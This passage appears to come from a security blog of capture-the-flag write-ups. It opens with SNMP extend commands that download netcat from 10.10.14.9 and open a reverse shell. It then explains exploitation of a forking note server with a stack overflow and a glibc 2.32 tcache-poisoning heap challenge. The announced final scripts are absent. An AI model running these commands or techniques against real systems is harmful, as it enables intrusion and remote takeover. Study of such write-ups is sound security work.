snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.10.10.195 'nsExtendStatus."command"'  = createAndGo 'nsExtendCommand."command"' = /usr/bin/nohup 'nsExtendArgs."command"' =  'wget http://10.10.14.9/nc -q -O /dev/shm/nc'

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.10.10.195 'nsExtendStatus."command"'  = createAndGo 'nsExtendCommand."command"' = /usr/bin/nohup 'nsExtendArgs."command"' = 'chmod +x /dev/shm/nc'

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.10.10.195 'nsExtendStatus."command"'  = createAndGo 'nsExtendCommand."command"' = /usr/bin/nohup 'nsExtendArgs."command"' = '/dev/shm/nc 10.10.14.9 1337 -e /bin/sh'

The following was the source:

This is just a variation of the previous forking stack overflow server pwns I've written extensively about in both my Rope and Patents writeup, so I'll skim through this pwn. It's another forking note app, with PIE, FULL RELRO, and canary (which is trivial to beat once you leak since it is forking).

Your options are ‘\x01’ for write, ‘\x02’ for copy, and ‘\x03’ for show. When you write data, you tell it the length, and it adds the length to an index to check if their sum is over the buffer size. If it's not, you can send in data with specified length size to the note char array starting at the current index, and it increments your index by the buffer size you requested. Do note that you can only send in a byte for the requested size.

For copy, you get 2 bytes to specify an offset, and the offset is checked to remain in the range of 0 and the current index. However, the size to be copied isn't checked, so there is a potential overflow once it copies from the note buffer at the specified offset to the note buffer at the current index. It also increases the index by the specified copy amount, so we can read out of bounds with this as well (as show doesn't check).

For show, there isn't much to know except that it writes out data and returns, so the fork ends.
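The three options can be modelled with a toy class to see why the missing size check matters. This is a simplified model of the behaviour as described, not the server's code: the 1024 byte buffer, the inclusive offset check, and the stack contents are assumptions made for illustration.

```python
BUF_SIZE = 1024


class NoteModel:
    """Note buffer followed by whatever lives after it on the stack."""

    def __init__(self, stack_after: bytes):
        self.mem = bytearray(BUF_SIZE) + bytearray(stack_after)
        self.index = 0

    def write(self, data: bytes) -> bool:
        if len(data) > 0xFF:                       # size is sent as a single byte
            raise ValueError("size must fit in one byte")
        if self.index + len(data) > BUF_SIZE:      # checked against the buffer size
            return False
        self.mem[self.index:self.index + len(data)] = data
        self.index += len(data)
        return True

    def copy(self, offset: int, size: int) -> bool:
        if not 0 <= offset <= self.index:          # only the offset is validated
            return False
        chunk = bytes(self.mem[offset:offset + size])
        self.mem[self.index:self.index + size] = chunk   # no bounds check on size
        self.index += size
        return True

    def show(self) -> bytes:
        return bytes(self.mem[:self.index])        # prints index bytes, unchecked


def fill(model: NoteModel, prefix: bytes = b"") -> None:
    """Write prefix, then pad with 'A' until index reaches BUF_SIZE."""
    model.write(prefix)
    while model.index < BUF_SIZE:
        model.write(b"A" * min(0xFF, BUF_SIZE - model.index))


stack = b"CANARY!!" + b"SAVEDRBP" + b"RETADDR_"

leak = NoteModel(stack)
fill(leak)
leak.copy(BUF_SIZE, len(stack))        # copy a region onto itself: only index grows
print(leak.show()[BUF_SIZE:])

smash = NoteModel(stack)
fill(smash, prefix=b"X" * len(stack))
smash.copy(0, len(stack))              # copy the front of the buffer past its end
print(bytes(smash.mem[BUF_SIZE:]))
```

In this model, a copy from the current index onto itself leaves memory untouched but pushes the index past the buffer, so show leaks what follows, while a copy from offset 0 overwrites it with attacker-controlled bytes.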

In my exploit, I basically first increased the index to 1024 and abused copy's lack of checks to extend the index so that the buffer printed with option 3 will leak canary, stack addresses, and pie base. Then I wrote a rop chain with proper padding and canary in front to leak libc addresses in the front of the buffer (and adjusted it to increase the index to 1024), then had it copy the length of the rop itself from offset 0 to the current index (1024), allowing for an overflow to leak libc once we trigger a return with show. Then apply the same principle to dup2 the file descriptors and pop open a shell. Here is my final script:


And that should get us root shell! Thanks once again to sokafr for the fun box, and pottm and bjornmorten for giving my writeup a read through before publishing.

Sunday, October 4, 2020

CUCTF 2020 Dr. Xorisaurus Heap Writeup (glibc 2.32 UAF)

Here is my writeup for my 2.32 glibc heap challenge (Dr. Xorisaurus) from CUCTF 2020; make sure to check out the writeup for my kernel challenge Hotrod as well!

One important concept to note about glibc 2.32 is the new mechanism of safe linking on the singly linked lists. This new protection scheme is discussed in depth here. Basically, for singly linked freelists (fastbins and tcache bins), free chunk fds are obfuscated by the following scheme: (stored pointer) = (address of fd pointer >> 12) ^ (fd pointer). With a heap leak, this protection can be easily bypassed as heap behavior in glibc is predictable, which is what this challenge will revolve around. Bruteforcing or leaking a copy of the stored pointer and applying some basic crypto knowledge can help you recover the original data as well in some cases (especially when the chunks in the list are close together).
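The "basic crypto knowledge" part can be sketched as follows. When the fd field and the chunk it points to share the same upper bits (assumed here to mean the same 4 KiB page), the stored value can be undone 12 bits at a time from the top without any other leak. The addresses are invented and `recover` is a name chosen for this example.

```python
def protect(pos: int, ptr: int) -> int:
    """Safe-linking obfuscation: pos is the address of the fd field."""
    return (pos >> 12) ^ ptr


def recover(stored: int) -> int:
    """Undo safe linking, assuming pos >> 12 == ptr >> 12."""
    value = stored
    mask = 0xFFF << 52                  # the top 12 bits are stored unmodified
    while mask:
        value ^= (value & mask) >> 12   # fix the next 12 bits using the ones above
        mask >>= 12
    return value


fd_field = 0x55555555B2A0               # hypothetical freed chunk
next_chunk = 0x55555555B6C0             # hypothetical next chunk on the same page

stored = protect(fd_field, next_chunk)
print(hex(stored), hex(recover(stored)))
```

If the two chunks sit on different pages the low bits come out wrong, which is why this only works in some cases.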

In this challenge, we were given a libc with debug symbols, linker, and patchelf'd binary with the following protections:

Now, when reversing this binary, one should find 4 features. 

You can fill a glass, examine a glass, drain a glass, and switch the contents of the glass according to the menu. There is also an alarm (SIGALRM) set at the start, and you can only have a maximum of 25 glasses. Filling a glass is equivalent to an allocation; it finds an index in the global glasses array for you, requests a size in the range of 0x60 and larger fastbin sizes, and reads in some data. Examining a glass can be useful for leaks, as it just puts() the content of the chunk out; note that examinations can only be used twice (which can be assumed to be for a libc leak and a heap leak). Draining is the equivalent of a free, and it is safe as it nulls out the pointer in the global array. You can use this feature as many times as you want, but once you swap contents (feature 4), you can only free one more time. As for the swap function, you can use it to free a chunk and then immediately reallocate based on 2 choices for sizes. After the allocation, the binary reads in 8 bytes. This is where the 8 byte UAF comes in: the conditional is poorly written, so if you select an invalid choice, there will be no re-allocation and you will be reading into the freed chunk's metadata (take a look at the decompilation below). Now let's plan out our exploit:

One might make the mistake of thinking of using swap to create a double free, but the 8 byte UAF only reaches the fd and won't allow you to change the tcache key, so freeing that chunk again will fail the tcache double free check in free(). Some might think about filling tcache and then applying a fastbin dup attack, but the fact that you can only free one more time after swapping prevents the bypass against the fastbin double free check.

To obtain a leak, one might be tempted to just free a chunk and then reallocate it to see the obfuscated pointer (and then shift left by 12 bits to recover heap base). However, the read call during the allocation requires at least one byte (unless pty is enabled server side), so 5 nibbles of the heap address will be missing. This means there would be 1 byte of entropy on the leak, but a proof of work is required for 3 bytes of a random sha256 hash on remote, so bruteforcing isn't as feasible.
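The arithmetic behind that "1 byte of entropy" can be sketched as follows. This is just an illustration with a made-up chunk address and a hypothetical helper name: the leaked value is the stored pointer of a lone tcache chunk (so `chunk >> 12`) with its lowest byte replaced by the one byte we were forced to send.

```python
def candidate_pages(leaked: int) -> list:
    """Return every page address consistent with a leak whose low byte was clobbered."""
    high = leaked & ~0xFF  # the bits that survived our forced one-byte write
    return [(high | low) << 12 for low in range(256)]


# Hypothetical chunk address, for illustration only.
chunk = 0x55555555B2A0
stored = chunk >> 12                # fd is NULL, so only the key remains
leaked = (stored & ~0xFF) | 0x41    # our mandatory input byte ('A') overwrote the low byte

pages = candidate_pages(leaked)
```

The real page (`0x55555555b000` here) is one of 256 candidates, which is a small search space on its own but painful when every remote attempt also costs a proof of work.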

A better way to obtain a leak is to abuse the behavior of scanf. When scanf reads in large payloads of characters that follow its format specifier, scanf will begin to allocate from the heap. For example, if we send in 0x500 '1's, scanf will make a largebin allocation request from the heap. As one familiar with the heap might know, triggering largebin sized allocations will lead to malloc_consolidate() (source), which will go through the freed fastbins and consolidate them to unsorted (source). This malloc_consolidate() is the basis for another type of attack known as fastbin consolidation, which is discussed here in better depth. After malloc_consolidate(), the request for the large allocation will then cause the chunk in unsorted to be sorted into largebin. On the next request, one can use it to request a heap leak. The chunk will then be sorted into unsorted, from which we can easily grab a heap leak (feel free to debug this out when I attach my exploit later on if this seems confusing). This method of leaking really only came up after my teammate c3bacd17 found an unintentional bypass in one of my other challenges.

Once we have the leak, some basic math will allow you to abuse the 8 byte UAF to maliciously corrupt the obfuscated pointer. Note that 2.32 malloc()'s safe linking mechanism also ensures that the deobfuscated pointer is aligned. Because of this and the fastbin size check, we can no longer do the unaligned trick here for fastbin dup. We will have to rely on tcache poisoning here, and an evil obfuscated pointer can be created by xoring the address of the fd right shifted by 12 bits with the target location.
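The "basic math" for the poisoned pointer looks roughly like this in Python. Treat it as a sketch with made-up addresses rather than my actual exploit code; `forge_fd` is a hypothetical helper, and the 16-byte alignment it enforces is the x86-64 malloc alignment that the 2.32 tcache check expects.

```python
import struct


def forge_fd(fd_location: int, target: int) -> int:
    """Build the value to write over a freed tcache chunk's fd so that it reveals to target."""
    if target & 0xF:
        # An unaligned target would trip the alignment check when the entry is taken.
        raise ValueError("target must be 16-byte aligned")
    return (fd_location >> 12) ^ target


# Hypothetical addresses, for illustration only.
fd_location = 0x55555555B2A0  # address of the freed chunk's fd, known from the heap leak
target = 0x7FFFF7FC5E40       # where we want a later allocation to land

forged = forge_fd(fd_location, target)
payload = struct.pack("<Q", forged)  # exactly the 8 bytes the UAF lets us write
```

If the address you actually care about is not 16-byte aligned, one option is to aim at the aligned address just below it and pad the data you write by the difference.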

I ended up targeting __free_hook and changed it to system, then "freed" a chunk with the string "/bin/sh" on it to pop a shell. As for the proof of work on remote, it can easily be handled by the proofofwork python library that automatically generates a proof.

The following is my final exploit with comments:



Hope everyone enjoyed this challenge and writeup! Feel free to let me know if anything needs to be clarified or if anything explained is incorrect. Congrats to lms of Dakota State for blooding this challenge as well!

For those interested in trying this challenge out, it is archived in the CUCTF repos.